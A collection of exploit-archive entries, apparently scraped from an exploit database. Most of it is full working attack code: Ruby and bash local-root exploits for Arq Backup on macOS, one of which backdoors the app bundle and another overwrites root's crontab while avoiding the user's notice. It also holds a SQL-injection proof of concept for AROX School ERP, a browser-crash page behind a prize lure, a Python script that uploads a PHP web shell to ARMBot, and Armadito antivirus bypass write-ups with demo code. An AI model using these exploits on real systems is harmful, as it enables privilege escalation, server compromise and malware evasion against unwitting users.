After reversing the inter-app protocol I discovered that the path to the
restorer binary was specified as part of the data packet sent by the UI. After
receiving this, the restorer binaries then set +s and root ownership on this
path. This means we can specify an arbitrary path which will receive +s and root
ownership.

This issue is fixed in Arq 5.10.
=end

#!/usr/bin/env ruby

##################################################################
###### Arq <= 5.9.7 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html               ######
##################################################################

s = File.stat("/Applications/Arq.app/Contents/Resources/standardrestorer")

if s.mode != 0104755 or s.uid != 0
  puts "Not vulnerable - standardrestorer is not suid root."
  exit 1
end

binary_target = "/tmp/arq_597_exp"

d = "\x01\x00\x00\x00\x00\x00\x00\x00"
e = "\x00\x00\x00\x00\x03"
z = "0000"
target = sprintf("%s%s-%s-%s-%s-%s%s%s", z,z,z,z,z,z,z,z)
plist = "<plist version=\"1.0\"><dict><\/dict><\/plist>"
backup_set = "0" * 40
hmac = "0" * 40

payload = sprintf(
  "%s%s%s%s\$%s%s\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" +
  "\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00\x00" +
  "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30\x2e\x30" +
  "\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
  "\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s\x00\x00\x00%s" +
  "\x00\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00\x00\x00%s\x00\x00" +
  "\x00%s\x00\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00\x00\x00\x00\x00\x00" +
  "\x14\x00%s\x00\x00\x00\x00\x03%s\x0a",
    d, binary_target.length.chr, binary_target,
    d, target,
    d, plist.length.chr, plist,
    d, backup_set,
    d, d, d, hmac,
    d, d, d, e * 10
  )

shellcode = "#include <unistd.h>\nint main()\n{ setuid(0);setgid(0);"+
  "execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{binary_target};/bin/bash\","+
  "NULL);return 0; }"

IO.popen("gcc -xc -o #{binary_target} -", mode="r+") do |io|
  io.write(shellcode)
  io.close
end

IO.popen("/Applications/Arq.app/Contents/Resources/standardrestorer " +
  "2>/dev/null", mode="r+") do |io|
  io.getc && io.write(payload)
end

timeout=3
i=0

while (s = File.stat(binary_target)) && (s.mode != 0104755 or s.uid != 0)
  sleep 0.1
  i += 1

  if i >= (timeout * 10)
    break
  end
end

if s.mode == 0104755 and s.uid == 0
  system(binary_target)
  exit 0
end

puts "exploit failed"
HireHackking 
# Arq Backup from Haystack Software is a great application for backing up macs and
# windows machines. Unfortunately versions of Arq for mac before 5.9.7 are
# vulnerable to a local root privilege escalation exploit.

# The updater binary has a "setpermissions" function which sets the suid bit and
# root ownership on itself but it suffers from a race condition that allows you to
# swap the destination for these privileges using a symlink.

# We can exploit this to get +s and root ownership on any arbitrary binary.

# Other binaries in the application also suffer from the same issue.

# This was fixed in Arq 5.9.7.

# https://m4.rkw.io/arq_5.9.6.sh.txt
# 49cc82df33a3e23245c7a1659cc74c0e554d5fdbe2547ac14e838338e823956d
# ------------------------------------------------------------------------------
#!/bin/bash

##################################################################
###### Arq <= 5.9.6 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html                 ####
##################################################################

vuln=`ls -la /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater |grep 'rwsr-xr-x' \
|grep root`

cwd="`pwd`"

if [ "$vuln" == "" ] ; then
  echo "Not vulnerable - auto-updates not enabled."
  exit 1
fi

cat > arq_596_exp.c <<EOF
#include <unistd.h>
int main()
{
  setuid(0);
  seteuid(0);
  execl(
    "/bin/bash","bash","-c","rm -f $cwd/arq_updater;/bin/bash",
    NULL
  );
  return 0;
}
EOF

gcc -o arq_596_exp arq_596_exp.c
rm -f arq_596_exp.c

ln -s /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater

./arq_updater setpermissions &>/dev/null&
rm -f ./arq_updater
mv arq_596_exp ./arq_updater

i=0
timeout=10

while :
do
  r=`ls -la ./arq_updater |grep root`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.1
  i=$((i+1))
  if [ $i -eq $timeout ] ; then
    rm -f ./arq_updater
    echo "Not vulnerable"
    exit 1
  fi
done

./arq_updater
HireHackking 
#!/bin/bash

#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html              ######
#################################################################

app="/Applications/Arq.app"
res="$app/Contents/Resources"
lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources"

vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root`

if [ "$vuln" == "" ] ; then
  echo "Not vulnerable - auto-updates not enabled."
  exit 1
fi

if [ "$1" != "-f" ] ; then
  latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`"
  status_line="`egrep -i 'backup session.*?(ended|started)' \
    \"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`"

  if [ "$status_line" != "" ] ; then
    echo -n "WARNING: backup in progress, the user will very "
    echo "likely notice if we exploit now!"
    echo "use -f to override."
    exit 1
  fi
fi

owd="`pwd`"

if [ -e ~/.arq_510_privesc_exp ] ; then
  rm -rf ~/.arq_510_privesc_exp
fi

mkdir ~/.arq_510_privesc_exp
cd ~/.arq_510_privesc_exp

echo "copying application..."

cp -R /Applications/Arq.app .

echo "compiling payloads..."

cat > payload.sh <<EOF
#!/bin/bash
rm -rf $HOME/.arq_510_privesc_exp
while :
do
  pid=\`ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \
    |cut -d ' ' -f2\`
  if [ "\$pid" != "" ] ; then
    kill -9 \$pid
    open $app/Contents/Library/LoginItems/Arq\ Agent.app
    exit 0
  fi
done
EOF
chmod 755 payload.sh

au_relative=`echo "$lires/standardrestorer" |sed 's/^\/Applications\///'`

cat > shell.c <<EOF
#include <unistd.h>
#include <string.h>
int main(int ac, char *av[])
{
  if (ac > 1 && strcmp(av[1], "boom") == 0) {
    setuid(0);
    setgid(0);
    execl(
      "/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr"
      "estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay"
      "load.sh;/bin/bash", NULL
    );
  }
  return 0;
}
EOF
mv Arq.app/Contents/Resources/standardrestorer \
  Arq.app/Contents/Resources/standardrestorer.orig
gcc -o Arq.app/Contents/Resources/standardrestorer shell.c
rm -f shell.c

payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8`
GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1`
cwd=`pwd`

echo "creating backdoored Arq.zip..."
zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null
rm -rf Arq.app/

echo "executing upgrade..."

"$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \
  1>/dev/null 2>/dev/null

echo "waiting..."
while :
do
  ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8`
  x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root`

  if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then
    cd "$owd"
    $res/standardrestorer boom
    exit 0
  fi
  sleep 0.2
done
HireHackking 
#!/usr/bin/env ruby

#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html              ######
#################################################################
######                                                     ######
###### Usage:                                              ######
######                                                     ######
###### ./arq_5.10.rb  # stage 1                            ######
######                                                     ######
###### (wait for next Arq backup run)                      ######
######                                                     ######
###### ./arq_5.10.rb  # stage 2                            ######
######                                                     ######
###### if you know the HMAC from a previous run:           ######
######                                                     ######
###### ./arq_5.10.rb stage2 <hmac>                         ######
######                                                     ######
#################################################################
###### USE AT YOUR OWN RISK - THIS WILL OVERWRITE THE ROOT ######
###### USER'S CRONTAB!                                     ######
#################################################################

$binary_target = "/tmp/arq_510_exp"

class Arq510PrivEsc
  def initialize(args)
    @payload_file = ".arq_510_exp_payload"
    @hmac_file = ENV["HOME"] + "/.arq_510_exp_hmac"
    @backup_file = ENV["HOME"] + "/" + @payload_file

    @target = shell("ls -1t ~/Library/Arq/Cache.noindex/ |head -n1")
    @bucket_uuid = shell("grep 'writing head blob key' " +
      "~/Library/Logs/arqcommitter/* |tail -n1 |sed 's/^.*key //' |cut -d " +
      "' ' -f4")
    @computer_uuid = shell("cat ~/Library/Arq/config/app_config.plist |grep " +
      "-A1 #{@target} |tail -n1 |xargs |cut -d '>' -f2 |cut -d '<' -f1")
    @backup_endpoint = shell("cat ~/Library/Arq/config/targets/#{@target}.target " +
      "|grep -A1 '>endpointDescription<' |tail -n1 |xargs |cut -d '>' -f2 " +
      "| cut -d '<' -f1")
    @latest_backup_set = latest_backup_set

    puts "         target: #{@target}"
    puts "    bucket uuid: #{@bucket_uuid}"
    puts "  computer uuid: #{@computer_uuid}"
    puts "backup endpoint: #{@backup_endpoint}"
    puts "  latest backup: #{@latest_backup_set}\n\n"

    if args.length >0
      method = args.shift
      if respond_to? method
        send method, *args
      end
    else
      if File.exist? @hmac_file
        method = :stage2
      else
        method = :stage1
      end

      send method
    end
  end

  def shell(command)
    `#{command}`.chomp
  end

  def latest_backup_set
    shell("grep 'writing head blob' ~/Library/Logs/arqcommitter/* |tail -n1 " +
      "|sed 's/.*key //' |cut -d ' ' -f1")
  end

  def scan_hmac_list
    packsets_path = shell("find ~/Library/Arq/ -type d -name packsets")
    hmac = {}

    shell("strings #{packsets_path}/*-trees.db").split("\n").each do |line|
      if (m = line.match(/[0-9a-fA-F]+/)) and m[0].length == 40
        if !hmac.include? m[0]
          hmac[m[0]] = 1
        end
      end
    end

    hmac
  end

  def stage1
    print "building HMAC cache... "

    hmac = scan_hmac_list

    File.open(@hmac_file, "w") do |f|
      f.write(@latest_backup_set + "\n" + hmac.keys.join("\n"))
    end

    puts "done - stored at #{@hmac_file}"

    print "dropping backup file... "

    File.open(@backup_file, "w") do |f|
      f.write("* * * * * /usr/sbin/chown root:wheel #{$binary_target} &&" +
        "/bin/chmod 4755 #{$binary_target}\n")
    end

    puts "done"
    puts "wait for the next backup run to complete and then run again"
  end

  def stage2(target_hmac=nil)
    if !target_hmac
      if !File.exist? @hmac_file
        raise "hmac list not found."
      end

      print "loading HMAC cache... "

      data = File.read(@hmac_file).split("\n")

      puts "done"

      initial_backup_set = data.shift

      if initial_backup_set == @latest_backup_set
        puts "no new backup created yet"
        exit 1
      end

      hmac = {}
      data.each do |h|
        hmac[h] = 1
      end

      hmac_targets = []

      print "scanning for HMAC targets... "

      scan_hmac_list.keys.each do |h|
        if !hmac[h]
          hmac_targets.push h
        end
      end

      puts "done"

      if hmac_targets.length == 0
        puts "no HMAC targets, unable to continue."
        exit 0
      end

      puts "found #{hmac_targets.length} HMAC targets"

      hmac_targets.each do |hmac|
        attempt_exploit(hmac)
      end
    else
      attempt_exploit(target_hmac)
    end
  end

  def build_payload(hmac)
    d = "\x01\x00\x00\x00\x00\x00\x00\x00"
    e = "\x00\x00\x00\x00\x03"

    @overwrite_path = '/var/at/tabs/root'

    plist = "
<plist version=\"1.0\">
    <dict>
        <key>Endpoint</key>
        <string>#{@backup_endpoint}</string>
        <key>BucketUUID</key>
        <string>#{@bucket_uuid}</string>
        <key>BucketName</key>
        <string>/</string>
        <key>ComputerUUID</key>
        <string>#{@computer_uuid}</string>
        <key>LocalPath</key>
        <string>/</string>
        <key>LocalMountPoint</key>
        <string>/</string>
        <key>StorageType</key>
        <integer>1</integer>
        <key>SkipDuringBackup</key>
        <false></false>
        <key>ExcludeItemsWithTimeMachineExcludeMetadataFlag</key>
        <false></false>
    </dict>
</plist>"

    hex = plist.length.to_s(16).rjust(4,'0')
    plist_size = (hex[0,2].to_i(16).chr + hex[2,2].to_i(16).chr)

    pfl = @payload_file.length.chr
    opl = @overwrite_path.length.chr
    bel = @backup_endpoint.length.chr

    payload = sprintf(
      (
        "%s\$%s%s%s%s\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" +
        "\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00" +
        "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30" +
        "\x2e\x30\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s" +
        "\x00\x00\x00%s%s%s\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00" +
        "\x00\x00%s\x00\x00\x00%s%s%s\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00" +
        "\x00\x00\x00\x00\x00\x14\x00%s%s%s\x00\x00\x00\x03%s\x0a"
      ).force_encoding('ASCII-8BIT'),
        d, @target,
        d, bel, @backup_endpoint,
        plist_size, plist,
        d, @latest_backup_set,
        d, d, pfl, @payload_file,
        d, hmac,
        d, d, pfl, @payload_file,
        d, opl, @overwrite_path,
        e * 10
      )

    return payload
  end

  def attempt_exploit(hmac)
    print "trying HMAC: #{hmac} ... "

    File.open("/tmp/.arq_exp_510_payload","w") do |f|
      f.write(build_payload(hmac))
    end

    output = shell("cat /tmp/.arq_exp_510_payload | " +
      "/Applications/Arq.app/Contents/Resources/standardrestorer 2>/dev/null")

    File.delete("/tmp/.arq_exp_510_payload")

    if output.include?("Creating directory structure") and !output.include?("failed")
      puts "SUCCESS"

      print "compiling shell invoker... "

      shellcode = "#include <unistd.h>\nint main()\n{ setuid(0);setgid(0);" +
        "execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{$binary_target};rm -f " +
        "/var/at/tabs/root;/bin/bash\","+ "NULL);return 0; }"

      IO.popen("gcc -xc -o #{$binary_target} -", mode="r+") do |io|
        io.write(shellcode)
        io.close
      end

      puts "done"

      print "waiting for root+s... "

      timeout = 61
      i = 0
      stop = false

      while i < timeout
        s = File.stat($binary_target)

        if s.mode == 0104755 and s.uid == 0
          puts "\n"
          exec($binary_target)
        end

        sleep 1
        i += 1

        if !stop
          left = 60 - Time.now.strftime("%S").to_i
          left == 1 && stop = true

          print "#{left} "
        end
      end

      puts "exploit failed"
      exit 0
    else
      puts "FAIL"
    end
  end
end

Arq510PrivEsc.new(ARGV)
HireHackking 
# # # # # 
# Exploit Title: AROX School ERP PHP Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://arox.in/
# Software Link: https://www.codester.com/items/4908/arox-school-erp-php-script
# Demo: http://erp1.arox.in/
# Version: CVE-2017-15978
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/office_admin/?pid=95&action=print_charactercertificate&id=[SQL]
# http://localhost/[PATH]/office_admin/?pid=95&action=edit&id=3[SQL]
# 
# Parameter: id (GET)
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: pid=95&action=print_charactercertificate&id=3 AND SLEEP(5)
# 
# Parameter: id (GET)
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: pid=95&action=edit&id=3 AND SLEEP(5)
# 
# Etc..
# # # # #
HireHackking 
source: https://www.securityfocus.com/bid/54599/info

Arora Browser is prone to a remote denial-of-service vulnerability.

Attackers can exploit these issues to crash an application, which causes a denial-of-service condition. 

<html>
<head>
<title>Arora Browser Remote Denial of Service </title>
<body bgcolor="Grey">
<script type="text/javascript">
function loxians() {
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2><a href="javascript:loxians();">YOU HAVE WON 100,000$ ! CLICK HERE!!</a></font></h2>
</body>
</html>
HireHackking 
import requests

URL = "http://127.0.0.1/ARMBot/upload.php"
r = requests.post(URL,
                  data = {
                     "file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;)
                     "data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?>
                     "message":"Bobr Dobr"
                  }, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"})
print(r.status_code)
print("shell should be at http://{}/.s.phtml".format(URL))
HireHackking 
/*
Title: Armadito Antivirus - Malware Detection Bypass 
Date: 21/02/2018
Author: Souhail Hammou
Author's website: http://rce4fun.blogspot.com
Vendor Homepage: http://www.teclib-edition.com/en/
Version: 0.12.7.2
CVE: CVE-2018-7289


Details:
--------
An issue was discovered in armadito-windows-driver/src/communication.c affecting Armadito 0.12.7.2 and previous versions.
Malware with filenames containing pure UTF-16 characters can bypass detection. 
The user-mode service will fail to open the file for scanning after the conversion is done from Unicode to ANSI. 
This happens because characters that cannot be converted from Unicode are replaced with the '?' character.

The code responsible for this issue is located in armadito-windows-driver/src/communication.c

========================================================================================================
		 // Convert unicode string to ansi string for ring 3 process.		 
		 ntStatus = RtlUnicodeStringToAnsiString(&AnsiString, (PCUNICODE_STRING)FilePath, TRUE); 
		 if(!NT_SUCCESS(ntStatus)){ 
			DbgPrint("[-] Error :: ArmaditoGuard!SendScanOrder :: RtlUnicodeStringToAnsiString() routine failed !! \n"); 
			__leave; 
		 } 
========================================================================================================

The two examples below demonstrate the bug. 
In the first case, the filename is in Arabic and in the second, the filename's first letter is the greek M (U+039C).


Original filename:
 مرحبا.exe : 0645 0631 062d 0628 0627 002e 0065 0078 0065 

Converted to ANSI by Armadito:
 ?????.exe : 3f 3f 3f 3f 3f 2e 65 78 65 

=============================

Original filename:
 Μalware.exe : 039c 0061 006c 0077 0061 0072 0065 002e 0065 0078 0065 

Converted to ANSI by Armadito:
 ?alware.exe : 3f 61 6c 77 61 72 65 2e 65 78 65 


See: https://github.com/armadito/armadito-windows-driver/issues/5
*/
HireHackking 
/*
# Exploit Title : Armadito antimalware - Backdoor/Bypass
# Date : 07-06-2016 (DD-MM-YYYY)
# Exploit Author : Ax.
# Vendor Homepage : http://www.teclib-edition.com/teclib-products/armadito-antivirus/
# Software Link : https://github.com/41434944/armadito-av
# Version : No version specified. Fixed 07-06-2016 post-disclosure
# Tested on : Windows 7

1. Description
Armadito is an modern antivirus developped by the french company TecLib' (http://www.teclib.com/). Looking at the source code made public few days ago we discovered that there was a backdoor (or a really lack of knowledge from their developpers, meaning that they should reconsider working in security).

2. Proof Of Concept
As it can be seen in the GitHub repository in the file : armadito-av/core/windows/service/scan_onaccess.c at line 283. An obvious backdoor has been implemented.

[SOURCE]
			if (msDosFilename == NULL) {
				a6o_log(ARMADITO_LOG_SERVICE,ARMADITO_LOG_LEVEL_WARNING, " ArmaditoSvc!UserScanWorker :: [%d] :: ConvertDeviceNameToMsDosName failed :: \n",ThreadId);				
				scan_result = ARMADITO_EINVAL;
			}
			else if (strstr(msDosFilename,"ARMADITO.TXT") != NULL) {  // Do not scan the log file. (debug only)
				scan_result = ARMADITO_WHITE_LISTED;
			}
			else {

				// launch a simple file scan
				//printf("[+] Debug :: UserScanWorker :: [%d] :: a6o_scan :: [%s] \n",ThreadId,msDosFilename);
				scan_result = a6o_scan_simple(Context->armadito, msDosFilename, &report);
				a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_DEBUG, "[+] Debug :: UserScanWorker :: [%d] :: %s :: %s\n", ThreadId, msDosFilename, ScanResultToStr(scan_result));
				printf("[+] Debug :: UserScanWorker :: [%d] :: %s :: %s\n", ThreadId, msDosFilename, ScanResultToStr(scan_result));

			}
[/SOURCE]

Calling a file ARMADITO.TXT-Malware.exe (or whatever containing ARMADITO.TXT in its name) simply bypass the runtime analysis of the antivirus. You can find attach a small piece of code based on Armadito to reproduce the exploit.

3. Solution

Stop paying developpers that do not know how to deal with security. (Reading the rest of the code has been an exhausting work).

3 bis. Real solution

It seems that they fixed the backdoor already (https://github.com/armadito/armadito-av/blob/DEV/core/windows/service/scan_onaccess.c)
*/

#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
#define BUFSIZE 4096
#define MAX_PATH_SIZE 255
#define ARMADITO_EINVAL 0
#define ARMADITO_WHITE_LISTED 1
char * ConvertDeviceNameToMsDosName(LPSTR DeviceFileName)
{
	char deviceDosName[BUFSIZE];
	char deviceLetter[3] = { '\0' };
	char deviceNameQuery[BUFSIZE] = { '\0' };
	char * deviceDosFilename = NULL;
	DWORD len = 0;
	DWORD len2 = 0;
	DWORD ret = 0;
	BOOL bFound = FALSE;
	char * tmp;

	if (DeviceFileName == NULL) {
		//a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_WARNING, " [-] Error :: ConvertDeviceNameToMsDosName :: invalid parameter DeviceName\n");
		printf("FileName null.\n");
		return NULL;
	}

	// Get the list of the logical drives.
	len = GetLogicalDriveStringsA(BUFSIZE, deviceDosName);
	if (len == 0) {
		//a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_WARNING, "[-] Error :: ConvertDeviceNameToMsDosName!GetLogicalDriveStrings() failed ::  error code = 0x%03d", GetLastError());
		printf("Error : GetLogicalDriveStringsA()\n");
		return NULL;
	}


	tmp = deviceDosName;

	do {

		//printf("[+] Debug :: deviceDosName = %s\n",tmp);

		// Get the device letter without the backslash (Ex: C:).
		memcpy_s(deviceLetter, 2, tmp, 2);

		if (!QueryDosDeviceA(deviceLetter, deviceNameQuery, BUFSIZE)) {
			//a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_WARNING, "[-] Error :: QueryDosDeviceA() failed ::  error code = 0x%03d\n", GetLastError());
			printf("Error : QuedryDosDeviceA()\n");
			return NULL;
		}
		
		//printf("[+] Debug :: DeviceName = %s ==> %s\n",deviceNameQuery,deviceLetter);
		if (deviceNameQuery == NULL) {
			//a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_WARNING, "[-] Error :: ConvertDeviceNameToMsDosName :: QueryDosDeviceA() failed ::  deviceNameQuery is NULL\n", GetLastError());
			printf("deviceNameQuery null.\n");
		}

		if (deviceNameQuery != NULL && strstr(DeviceFileName, deviceNameQuery) != NULL) {
			//printf("[+] Debug :: FOUND DeviceName = %s ==> %s\n",deviceNameQuery,deviceLetter);

			len2 = strnlen_s(deviceNameQuery, MAX_PATH_SIZE);
			len = strnlen_s(DeviceFileName, MAX_PATH_SIZE) - len2 + 3;

			deviceDosFilename = (char*)calloc(len + 1, sizeof(char));
			deviceDosFilename[len] = '\0';

			memcpy_s(deviceDosFilename, len, tmp, 3);
			memcpy_s(deviceDosFilename + 2, len, DeviceFileName + len2, len - 1);

			bFound = TRUE;

		}

		// got to the next device name.
		while (*tmp++);
		//printf("[+] Debug :: next device name = %s\n",tmp);


	} while (bFound == FALSE && *tmp);


	if (bFound == FALSE) {
		return NULL;
	}

	return deviceDosFilename;
}


int main(int argc, char ** argv)
{
	char * msDosFilename = NULL;
	int i = 0;
	LPSTR ArmaditoFile = "\\Device\\HarddiskVolume2\\ARMADITO.TXT"; /* Converted, this is C:\\ARMADITO.txt */
	LPSTR BinaryFile = "\\Device\\HarddiskVolume2\\Malware.exe"; /* Converted, this is C:\\malware.exe */
	LPSTR BinaryPOCFile = "\\Device\\HarddiskVolume2\\ARMADITO.TXT-ILoveJeromeNotin.exe"; /* Converted, this is C:\\ARMADITO.txt-ILoveJeromeNotin.exe */
	char *string;
	int scan_result = -1;
	
	/* Armadito get the filename from message->msg.FileName ; We remplaced it using a simple string*/
	// msDosFilename = ConvertDeviceNameToMsDosName(message->msg.FileName);
	for (i = 0; i < 3; i++)
	{
		if (i == 0)
		{
			printf("Scanning C:\\ARMADITO.txt\n");
			msDosFilename = ConvertDeviceNameToMsDosName(ArmaditoFile);
		}
		else if (i == 1)
		{
			printf("Scanning C:\\malware.exe\n");
			msDosFilename = ConvertDeviceNameToMsDosName(BinaryFile);
		}
		else
		{
			printf("Scanning C:\\ARMADITO.txt-ILoveJeromeNotin.exe\n");
			msDosFilename = ConvertDeviceNameToMsDosName(BinaryPOCFile);
		}
		//report.status = ARMADITO_CLEAN;
		/* If the ConvertDeviceNametoMsDosName fails */
		if (msDosFilename == NULL) {
			//a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_WARNING, " ArmaditoSvc!UserScanWorker :: [%d] :: ConvertDeviceNameToMsDosName failed :: \n", ThreadId);
			scan_result = ARMADITO_EINVAL;
		}
		/* If it contains ARMADITO.TXT ... SERIOUSLY ? */
		
		else if (strstr(msDosFilename, "ARMADITO.TXT") != NULL) {  // Do not scan the log file. (debug only)
			scan_result = ARMADITO_WHITE_LISTED;
			printf("This file is not suspicious. Since it contains ARMADITO.txt ........... \n");
		}
		else {
			/* Armadito basic scan */
			printf("Armadito will now scan the file.\n");
			// launch a simple file scan
			//printf("[+] Debug :: UserScanWorker :: [%d] :: a6o_scan :: [%s] \n",ThreadId,msDosFilename);
			//scan_result = a6o_scan_simple(Context->armadito, msDosFilename, &report);
			//a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_DEBUG, "[+] Debug :: UserScanWorker :: [%d] :: %s :: %s\n", ThreadId, msDosFilename, ScanResultToStr(scan_result));
			//printf("[+] Debug :: UserScanWorker :: [%d] :: %s :: %s\n", ThreadId, msDosFilename, ScanResultToStr(scan_result));

		}

		printf("\n\n");
	}


	getchar();
	return 0;
}